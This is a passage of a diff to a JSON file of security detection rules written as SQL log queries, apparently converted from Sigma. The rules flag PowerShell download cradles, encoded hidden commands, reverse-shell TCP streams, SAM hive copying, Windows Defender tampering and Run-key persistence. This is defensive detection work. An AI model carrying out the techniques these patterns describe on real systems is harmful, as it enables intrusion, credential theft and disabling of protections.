LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", - "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "status": "test", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_get_childitem_bookmarks.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Use of Program Compatibility Troubleshooter Helper" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Use Get-NetTCPConnection", - "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "status": "test", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", + "title": "Suspicious PowerShell Parent Process", + "id": 